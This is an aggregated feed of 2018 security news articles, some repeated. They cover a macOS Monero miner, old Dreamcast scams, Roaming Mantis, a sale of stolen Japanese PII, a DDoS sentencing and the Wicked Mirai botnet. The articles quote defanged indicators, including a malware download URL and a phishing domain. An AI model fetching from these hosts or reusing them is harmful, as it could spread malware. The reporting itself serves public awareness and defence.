The post Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware appeared first on Security Affairs.

Security Affairs: Many users reported in the past few weeks their Macs have been infected with a new Monero Miner

In the past weeks, many Mac users have been infected with a new strain of Monero miner, the infections confirm the rise of this kind of malware.

According to researchers at Malwarebytes, many Mac users in the past weeks have been infected with a new strain of Monero miner. The owners of the infected Mac systems noticed the presence of a process named “mshelper” had been consuming a lot of CPU power and draining their batteries.

“The malware became public knowledge in a post on Apple’s discussion forums, where the “mshelper” process was found to be the culprit. Digging deeper, it was discovered that there were a couple other suspicious processes installed as well. We went searching and found copies of these files.” reads the analysis published by MalwareBytes.

“The malware is mining for Monero cryptocurrency. Here’s a breakdown of its components.”

Monero Miner

The Mac malware is likely installed by a fake Adobe Flash Player installers, through the downloading from piracy websites, or bait documents specially crafted to trick victims into opening them.

According to the experts, the launcher, the pplauncher file, is kept active by a launch daemon (com.pplauncher.plist), a circumstance that suggests that the dropper had root privileges. The launcher was developed in Golang, it has a relatively large executable file (3.5 Mb).

Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs.” continues the analysis published by Malwarebytes.

The launcher creates the miner process mshelper which is installed in the following location:

/tmp/mshelper/mshelper

The miner is an older version of the legitimate and open source mining tool named XMRig.

This malware is not particularly dangerous, but in case the infected system has a problem such as damaged fans or dust-clogged vents it could cause overheating.

“Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware,” concludes Malwarebytes.

“This malware follows other cryptominers for macOS, such as Pwnet, CpuMeaner, and CreativeUpdate. I’d rather be infected with a cryptominer than some other kind of malware, but that doesn’t make it a good thing.”

Users can manually remove the malware by deleting these two files and rebooting their devices:

  • /Library/LaunchDaemons/com.pplauncher.plist
  • /Library/Application Support/pplauncher/pplauncher

 

Pierluigi Paganini

(Security Affairs – Monero Miner, hacking)

The post Many users reported in the past few weeks their Macs have been infected with a new Monero Miner appeared first on Security Affairs.



Security Affairs

Many users reported in the past few weeks their Macs have been infected with a new Monero Miner

In the past weeks, many Mac users have been infected with a new strain of Monero miner, the infections confirm the rise of this kind of malware.

According to researchers at Malwarebytes, many Mac users in the past weeks have been infected with a new strain of Monero miner. The owners of the infected Mac systems noticed the presence of a process named “mshelper” had been consuming a lot of CPU power and draining their batteries.

“The malware became public knowledge in a post on Apple’s discussion forums, where the “mshelper” process was found to be the culprit. Digging deeper, it was discovered that there were a couple other suspicious processes installed as well. We went searching and found copies of these files.” reads the analysis published by MalwareBytes.

“The malware is mining for Monero cryptocurrency. Here’s a breakdown of its components.”

Monero Miner

The Mac malware is likely installed by a fake Adobe Flash Player installers, through the downloading from piracy websites, or bait documents specially crafted to trick victims into opening them.

According to the experts, the launcher, the pplauncher file, is kept active by a launch daemon (com.pplauncher.plist), a circumstance that suggests that the dropper had root privileges. The launcher was developed in Golang, it has a relatively large executable file (3.5 Mb).

Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs.” continues the analysis published by Malwarebytes.

The launcher creates the miner process mshelper which is installed in the following location:

/tmp/mshelper/mshelper

The miner is an older version of the legitimate and open source mining tool named XMRig.

This malware is not particularly dangerous, but in case the infected system has a problem such as damaged fans or dust-clogged vents it could cause overheating.

“Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware,” concludes Malwarebytes.

“This malware follows other cryptominers for macOS, such as Pwnet, CpuMeaner, and CreativeUpdate. I’d rather be infected with a cryptominer than some other kind of malware, but that doesn’t make it a good thing.”

Users can manually remove the malware by deleting these two files and rebooting their devices:

  • /Library/LaunchDaemons/com.pplauncher.plist
  • /Library/Application Support/pplauncher/pplauncher

 

Pierluigi Paganini

(Security Affairs – Monero Miner, hacking)

The post Many users reported in the past few weeks their Macs have been infected with a new Monero Miner appeared first on Security Affairs.

Happy anniversary to Dreamcast…and its scams

This month marks 20 years since the legendary SEGA Dreamcast console was first announced. Looked on fondly by gamers, it revolutionised many aspects of gaming and brought cheap(ish) online console gaming to the masses.

dreamcasts

Click to enlarge

SEGA has endured many, many calls for it to come back as Dreamcast 2. The games are widely demanded as retro remakes, and it’s never quite faded from public view. What you might not know is that it’s been the subject of a number of phishing scams/fakeouts down the years. Here are some of my favourites.

Ye olden days

In 2006, when dinosaurs ruled the Earth and televisions were black and white, the Dreamcast had been dead and buried for a few years already. But people still used them, modded them, and still went online with them. See, it came with a modem, and the idea was you went online via SegaNet or DreamArena to play online or just browse the web. You can still go online with them today, with a little bit of additional work.

And now, enter stage left: Shenmue.

shenmue collection

Click to enlarge

Anyone interested in games these days is likely already aware Shenmue 1 and 2 are being remastered, and there’s even a Shenmue 3 on the way to help tie up the dangling story:

Back in the day, it seemed there was no chance of this ever happening despite endless requests, campaigns, fan networks, the lot. While pleas fell seemingly by the wayside, mischievous individuals were all too happy to fill the SEGA shaped vacuum.

Here’s the interesting bit: Shenmue came with a disc called the Shenmue Passport, which was a crude way of popping a web browser via the game and looking at game-related content. It came to pass, one fateful day, while retro gamers were loading up their Passport disc that they saw the following:

Normally it’d say “click to enlarge” under that image, but the screenshot is so old this is the kind of maximum resolution size we have to cope with. (Dinosaurs and black and white televisions, remember?)

It says:

22/02/2006

The Shenmue Passport is in update process. Come again and visit us!

Downloads were suddenly available, with the promise of “more to come.” Everyone got excited, and some people even tried uploading their forklift truck racing times (long story).

forklift racing

Click to enlarge

Imagine their dismay when it turned out that someone had obtained the Shenmue(dot)com domain, and decided to play a prank. For a while, the Shenmue domain came back with all the various downloadables that you could no longer obtain through the game, but the addition of the “more to come” messaging made people believe this was the first step of the game returning in new forms. All I can say to that, is “Whoops.

Some forum threads about this still remain online, and you can see some of the fallout including attempts by SEGA to reclaim the URL.

Explanation

Click to enlarge

It reads:

Finally I want to say sorry again to all (like I said sorry in the Shenmue BBS), but now I promise to don’t do something stupid again. And sorry for my bad english (still learning) and my poor Japanese (still learning too). If anyone reach to a SEGA person, tell to him to contact me at [redacted] and I’ll transfer the domain as the people of this forum told me. Sorry again. But don’t loose the hope in Shenmue…

Oh dear.

2007: Shenmue 3 is coming (not)

Would you like a fake Shenmue 3 announcement? Of course you would. That video now has had more than 1 million views (with some 800,000 of those landing at time of launch), and unfortunately, it’s yet another fakeout. Its creator simply took footage from the older games and mashed it up with promotional material from the abandoned Shenmue Online. Here’s the now obligatory thread of angry gamers.

2008: Sign-ups and affiliate codes

You know how someone grabbed the Shenmue domain? Well, lightning struck twice in 2008 when someone did much the same thing with the Dreamcast website. Here’s what it suddenly looked like:

phishing for info?

Click to enlarge

“Do you still own a Dreamcast?”

Well, yes, several. Offering up the promise of a [yourname]ATdreamcast(dot)com email address, it sent the fans wild. Handing the new portal your console serial number(s), username, password, and a current email address would land you a seemingly valid yourserialnumber@user(dot)dreamcast(dot)com address. In practice, this meant the scammer ended up with a large list of emails to target with spam, and also—if people had reused passwords from their actual email for their “Dreamcast” mail—logins. My favourite thing about this was the video game website affiliate code ad hidden in the page:

code

Click to enlarge

2009: A grab bag of pranks

If you’re thinking this console has had a lot of scams hung around it, you’d be right. Step forward, 10th anniversary of said console filled with yet more shenanigans. These are most of the major Dreamcast-themed antics down the years, but there’s lots of others, like the photoshopped Shenmue 3 disc, or the edited “Shenmue 3: Believe” text from a magazine preview, which sent people into a frenzy.

Back to the future present

Now that Shenmue 3 is actually on the way, it’s likely that we’ll see some fresh new scams as the launch draws closer. You just can’t keep a good console—or a smart scam—down. Having said that, you don’t need to go digging around in the depths of retro gaming to find a scam. Your modern games and devices are often more than enough to keep scammers and other cybercriminals busy.

The post Happy anniversary to Dreamcast…and its scams appeared first on Malwarebytes Labs.

Is Cryptojacking Replacing Ransomware as the Next Big Threat?

Monitoring cyberthreats over time reveals interesting insights into the strategies used by cybercriminals and the evolution of the attack vectors they target. While the threat landscape continues to be quite diversified, trends do seem to run in predictable cycles. For example, over the last year or so ransomware has risen to become one of the most dominant threats plaguing organizations, especially in the market sectors of healthcare, finance, and education. 

read more

Pressures impacting security pros are up, threats are turning up the heat

Trustwave released the 2018 Security Pressures Report based on a global survey of 1,600 full-time IT professionals who are security decision makers or security influencers within their organization. Findings show that a majority of IT and cybersecurity professionals experienced increased pressures in 2017 when compared to the previous year, driven largely by a steep rise in sophisticated malware, continued deficit of high-level security talent and budget constraints. This report marks the fifth consecutive year pressures … More

The post Pressures impacting security pros are up, threats are turning up the heat appeared first on Help Net Security.

Crypto Me0wing attacks: Kitty cashes in on Monero

It’s been a month since the first Drupalgeddon 2.0 RCE (SA-CORE-2018-002/CVE-2018-7600) exploit was first published, unleashing its destruction into the wild… and through our cloud monitoring systems. As expected, since then we’ve been picking up various attack variants piggybacking on the Drupalgeddon 2.0 exploit, including remote scanners and backdoor attempts. In accordance with the latest dark web app hype, it wasn’t long until we started picking up cryptojacking exploit attempts directed at remote servers as … More

The post Crypto Me0wing attacks: Kitty cashes in on Monero appeared first on Help Net Security.

How an URL shortener allows malicious actors to hijack visitors’ CPU power

URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero. About the cnhv.co URL shortener “If you have an URL you’d like to forward your users to, you can create a cnhv.co shortlink to it. The user has to solves a number of hashes (adjustable by you) … More

The post How an URL shortener allows malicious actors to hijack visitors’ CPU power appeared first on Help Net Security.

The operations and economics of organized criminal email groups

Nine of the 10 captured organized criminal email groups operate out of Nigeria, they all leverage a multitude of attack methods, and business email compromise (BEC) is far more lucrative than any other attack, according to Agari. BEC is the most common attack type, indicative of a growing risk since the average age of the accounts was more than four years old, but BEC did not emerge until less than two years ago. “While much … More

The post The operations and economics of organized criminal email groups appeared first on Help Net Security.

Roaming Mantis gang evolves and broadens its operations

Roaming Mantis malware initially targeting Android devices, now has broadened both its geographic range and its targets.

Security experts from Kaspersky Lab discovered that the operators behind the Roaming Mantis campaign continue to improve their malware broadening their targets, their geographic range and their functional scope.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The dreaded DNS hijacking malware was originally designed to steal users’ login credentials and the secret code for two-factor authentication from Android devices, it has evolved and recently was spotted targeting iOS devices as well as desktop users.

“In April 2018, Kaspersky Lab published a blog post titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices.” reads the analysis published by Kaspersky.

“In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.”

Operators behind the Roaming Mantis malware recently added the support for 27 languages to broaden their operations.

The versions of the Roaming Mantis malware continue to be spread via DNS hijacking, attackers used rogue websites to serve fake apps infected with banking malware to Android users, phishing sites to iOS users, and redirect users to websites hosting cryptocurrency mining script.

To evade detection, malicious websites used in the campaign generate new packages in real time.

“Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018.It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes.” continues the analysis.

“This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.”

According to Kaspersky, the recent malicious apk now implements 19 backdoor commands, including the new one “ping” and sendSms, setWifi, gcont, lock, onRecordAction, call, get_apps,

Owners of iOS devices are redirected to a phishing site (http://security[.]apple[.]com/) that mimics the Apple website in the attempt of stealing user credentials and financial data (user ID, password, card number, card expiration date and CVV number).

Roaming Mantis

The Roaming Mantis operators have recently started targeting PC platforms, users are redirected to websites running the Coinhive web miner scripts.

The level of sophistication of the operations conducted by the Roaming Mantis gang and the rapid growth of the campaign lead the researchers into believing that the group has a strong financial motivation and is well-funded.

“The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.” concludes Kaspersky.
“The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.”

Further details, including IoCs are available in the report published by Kaspersky.

Pierluigi Paganini

(Security Affairs – Roaming Mantis, cybercrime)

The post Roaming Mantis gang evolves and broadens its operations appeared first on Security Affairs.

Fortnite is coming to Android, but malicious fake apps are already there

Android users eager to play the increasingly popular Fortnite survival game on their mobile devices are being targeted left and right with malicious apps masquerading as the game or apps related to it. What is Fortnite? Fortnite is a co-op sandbox survival game published by Epic Games. It was released for Microsoft Windows, macOS, PlayStation 4, and Xbox One in July 2017 and, more recently, for iOS. Its popularity is steadily rising and Epic has … More

The post Fortnite is coming to Android, but malicious fake apps are already there appeared first on Help Net Security.

Security Affairs newsletter Round 163 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A new flaw in Electron poses a risk to apps based on the framework
·      Malicious package containing Bytecoin cryptocurrency miner found on the Ubuntu Snap Store
·      UK mobile operator EE left a critical code system exposed with a default password
·      Chilis restaurant chain is the last victim of a Payment Card Breach
·      Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email
·      Nigelthorn malware infected over 100,000 systems abusing Chrome extensions
·      PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media
·      Researchers disclosed details of EFAIL attacks on in PGP and S/MIME tools. Experts believe claims are overblown
·      Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader
·      Dutch Government plans to phase out the use of Kaspersky solutions
·      Hackers shared technical details of a Code Injection flaw in Signal App
·      Massive DDoS attack hit the Danish state rail operator DSB
·      Rail Europe North America hit by payment card data breach
·      Anonymous defaced Russia govt website against Telegram ban
·      Mysterious hackers ingenuously reveal two Zero-Days to security community
·      Operation Hotel – Ecuador spent millions on spy operation for Julian Assange
·      Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
·      Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks
·      Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code
·      Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files
·      A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
·      CISCO issued security updates to address three critical flaws in Cisco DNA Center
·      Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software
·      The new Wicked Mirai botnet leverages at least three new exploits
·      A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market
·      Chrome evolves security indicators by marking with a red warning for HTTP content
·      More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit
·      Updated – The new Wicked Mirai botnet leverages at least three new exploits

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 163 – News of the week appeared first on Security Affairs.

Security Affairs: A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market

FireEye iSIGHT Intelligence discovered on the underground market a dataset allegedly containing 200 million unique sets of personally identifiable information stolen from several popular Japanese websites.

Security experts from FireEye iSIGHT Intelligence have discovered on underground forums a dataset allegedly containing 200 million unique sets of personally identifiable information (PII) stolen from several popular Japanese website databases.

It’s likely the data was taken via opportunistic compromise.

In reality, the dataset was discovered in an instant messenger group for sharing and offering data.

The huge trove of data was first discovered in December 2017, the archive was offered by a Chinese user at around $150.

Stolen records included names, credentials, email addresses, dates of birth, phone numbers, and home addresses.

The huge archive is composed of data stolen from Japanese websites of a variety of industries, including those in the retail, transportation sectors, food and beverage, financial, and entertainment.

According to the experts, data was raked between May and June 2016, the threat actor has offered for sale site databases on Chinese underground forums since at least 2013.

“Yes, we’ve observed actors who were selling Japanese PII data or interested in purchase,” said Oleg Bondarenko, senior manager for international research at FireEye. “However [we] have never observed at such scale.”

Many users commented on the advertisement demonstrating their interest for the data, but some of them provided negative feedback because they did not receive the purchased database.

“The data was extremely varied and not available through publicly available data sources; therefore, we believe that the advertised data is genuine,” states FireEye.

Experts believe data was genuine, they noticed that most of the email addresses out of a random sample of 200,000 belong to major third-party leaks.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” continues FireEye.

Japanese websites

The analysis of another sample composed of 190,000 credentials revealed that 36% contained duplicate values and the presence of a huge numbed fake email addresses.

The seller was offering data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye concluded.

According to the officials, the scale of the data put up for sale is unprecedented for Japan.

FireEye is warning Japanese government offices and affected businesses. They say the information could be used to carry out cyberattacks on Japan.

Masatomi Iwama, an executive of FireEye’s Japan branch, explained that people must be careful about their security hygiene.

Pierluigi Paganini

(Security Affairs – Japanese websites, data leak)

The post A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market appeared first on Security Affairs.



Security Affairs

A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market

FireEye iSIGHT Intelligence discovered on the underground market a dataset allegedly containing 200 million unique sets of personally identifiable information stolen from several popular Japanese websites.

Security experts from FireEye iSIGHT Intelligence have discovered on underground forums a dataset allegedly containing 200 million unique sets of personally identifiable information (PII) stolen from several popular Japanese website databases.

It’s likely the data was taken via opportunistic compromise.

In reality, the dataset was discovered in an instant messenger group for sharing and offering data.

The huge trove of data was first discovered in December 2017, the archive was offered by a Chinese user at around $150.

Stolen records included names, credentials, email addresses, dates of birth, phone numbers, and home addresses.

The huge archive is composed of data stolen from Japanese websites of a variety of industries, including those in the retail, transportation sectors, food and beverage, financial, and entertainment.

According to the experts, data was raked between May and June 2016, the threat actor has offered for sale site databases on Chinese underground forums since at least 2013.

“Yes, we’ve observed actors who were selling Japanese PII data or interested in purchase,” said Oleg Bondarenko, senior manager for international research at FireEye. “However [we] have never observed at such scale.”

Many users commented on the advertisement demonstrating their interest for the data, but some of them provided negative feedback because they did not receive the purchased database.

“The data was extremely varied and not available through publicly available data sources; therefore, we believe that the advertised data is genuine,” states FireEye.

Experts believe data was genuine, they noticed that most of the email addresses out of a random sample of 200,000 belong to major third-party leaks.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” continues FireEye.

Japanese websites

The analysis of another sample composed of 190,000 credentials revealed that 36% contained duplicate values and the presence of a huge numbed fake email addresses.

The seller was offering data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye concluded.

According to the officials, the scale of the data put up for sale is unprecedented for Japan.

FireEye is warning Japanese government offices and affected businesses. They say the information could be used to carry out cyberattacks on Japan.

Masatomi Iwama, an executive of FireEye’s Japan branch, explained that people must be careful about their security hygiene.

Pierluigi Paganini

(Security Affairs – Japanese websites, data leak)

The post A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market appeared first on Security Affairs.

A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms

A New Mexico man admitted being responsible for
DDoS attacks against the websites of former employers, business competitors, and public services.

John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular ‘services of “DDoS-for-hire” companies to power DDoS attacks against its victims,  cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser.

The list of the victims is long and include business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to a poor ops sec. The man sent emails to the victims while they were under DDoS attacks and proposed his services to mitigate the problems. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masquerading his real IP address.

stresser

The man initially rejected a plea deal, but in January he pleaded guilty to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States in the period between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon-in-possession of firearms and ammunition.

The man was condemned to 180-month in jail and will have to compensate the victims of his DDoS attacks, the overall amount will be determined soon.

Pierluigi Paganini

(Security Affairs – distributed denial-of-service, cybercrime)

 

The post A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms appeared first on Security Affairs.

Security Affairs: A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms

A New Mexico man admitted being responsible for
DDoS attacks against the websites of former employers, business competitors, and public services.

John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular ‘services of “DDoS-for-hire” companies to power DDoS attacks against its victims,  cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser.

The list of the victims is long and include business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to a poor ops sec. The man sent emails to the victims while they were under DDoS attacks and proposed his services to mitigate the problems. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masquerading his real IP address.

stresser

The man initially rejected a plea deal, but in January he pleaded guilty to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States in the period between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon-in-possession of firearms and ammunition.

The man was condemned to 180-month in jail and will have to compensate the victims of his DDoS attacks, the overall amount will be determined soon.

Pierluigi Paganini

(Security Affairs – distributed denial-of-service, cybercrime)

 

The post A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms appeared first on Security Affairs.



Security Affairs

This Week in Security News: Hackers and Cyber Attackers

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Chili’s parent company – Brinker International – announced that consumer credit and debit card information had been compromised at some locations. In addition, Trend Micro helped the FBI takedown hackers behind the notorious malware, Scan4You.

Read on to learn more.

The Rise and Fall of {Scan4You}

In May 2017, Scan4You, one of the biggest cybercrime facilitators went offline after the FBI arrested and extradited two main suspects.

Blockchain: The Missing Link Between Security and the IoT?

The internet of things (IoT) has been associated with major cyberattacks, often involving the abuse of vulnerable connected devices, such as surveillance cameras, to facilitate malicious activities.

White House Eliminates Cybersecurity Coordinator Role

The White House eliminated the position of cybersecurity coordinator on the National Security Council, a post that helped develop policy to defend against increasingly sophisticated digital attacks.

Homeland Security Unveils New Cyber Security Strategy Amid Threats

The Department of Homeland Security unveiled a national strategy for addressing the growing number of cyber security risks amid concerns about the security of the U.S. midterm congressional elections.

Data Breach in San Francisco Exposes Personal Information of Nearly 900 Patients

Nearly 900 patients at two city-run hospitals in San Francisco are being notified that their personal information was exposed in a data breach late last year.

Chili’s Says Customers’ Payment Information Compromised in Data Breach

Chili’s parent company, Brinker International, announced that customer credit and debit card information had been compromised in some Chili’s restaurants.

Suspected Member of TheDarkOverlord Hacking Group Arrested in Serbia

Serbian police have arrested a 38-year-old man from Belgrade on suspicion of being part of infamous hacking group, The Dark Overlord (TDO).

What do you think of the White House’s decision to eliminate the cybersecurity coordinator position? Share your thoughts in the comments below or follow me on Twitter to continue the conversation; @JonLClay.

The post This Week in Security News: Hackers and Cyber Attackers appeared first on .

Security Affairs: The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.

The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including SatoriMasuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.



Security Affairs

Updated – The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.

The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including SatoriMasuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Update May 19, 2018 – Spaeaking with MalwareMustDie

I have contacted Malware Must Die for a comment on the Wicked Mirai botnet.

Below the observations he shared with me:

  • Same coder.
